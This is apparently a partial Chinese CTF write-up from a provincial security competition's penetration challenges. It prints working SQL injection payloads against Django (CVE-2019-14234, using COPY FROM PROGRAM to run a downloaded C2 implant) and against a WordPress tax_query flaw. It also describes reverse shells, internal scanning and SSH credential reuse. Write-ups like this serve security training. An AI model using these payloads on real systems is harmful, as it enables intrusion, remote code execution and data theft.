某省信息安全竞赛
综合渗透-部分wp
Web-1-1
拿到题目之后大概长这个样子:
百度一下Django相关漏洞收到了两个链接:
CVE-2019-14234 | Django JSON SQL
注入漏洞 & 任意系统命令执行
https://www.bilibili.com/read/cv4579255/
https://blog.csdn.net/weixin_42250835/article/details/121106792
然后我使用的payload,然后从我的服务器上下载c2:
给一个可读可写可执行权限
admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27chmod 777 cc%27--%20
再运行:
admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27./cc%27--%20
就上线cs了,截图如下:
但是这里有个问题,没办法打开cs无法执行命令,老出错
没办法 我又反弹shell去拿到的flag
反弹shell方法很多不一一说了大家自己操作就行
考点就是这个漏洞利用。
Web-1-2
任意文件读取,这个没啥可说的
/tmp/flag2.txt
Web-1-3
通过上题最后上传了个metasploit的马然后挂上代理
Fscan内网扫描172.16.1.1/24
找到 http://172.16.1.100:8000/ Gerapy 存在CVE-2021-43857
https://blog.csdn.net/weixin_45778886/article/details/122332845
Web-2-1
一开始用wpscan扫描发现了用户名:deepmountains
和一个xmlrpc.php目录结果发现可以进行xml注入但是思路错了!!!
后来百度相关漏洞发现:
https://baijiahao.baidu.com/s?id=1725535135339225385&wfr=spider&for=pc
存在注入漏洞,于是根据大佬文章构造
action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,user(),0x5e))#"]}}}
改一下参数sqlmap跑一跑就出来了!!!
Web-2-2
上题sqlmap跑出来好多东西,根据提示得到的这些东西居然有用:
本以为是登录后台,通过模块写木马getshell
但是无法保存,后看到题目提示,可以根据注入找到得到VPN账号密码,连接VPN
连不上vpn,还要根据主办方提示是使用IPsec,而psk就是共享密钥!!!!
还要加个注册表的键值,百度查到解决办法:
https://github.com/hwdsl2/setup-ipsec-vpn/blob/master/docs/clients-zh.md#windows-%E9%94%99%E8%AF%AF-809
一顿输出后,成功连接,flag就是连上vpn的第一个ip
Web-2-3
这个就是送分了
根据题目给的IP扫描端口 发现22端口 使用vpn密码进行撞库(居然一样!!!)得到flag
原文始发于微信公众号(河北网络安全高校联盟):某省信息安全竞赛综合渗透-部分wp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论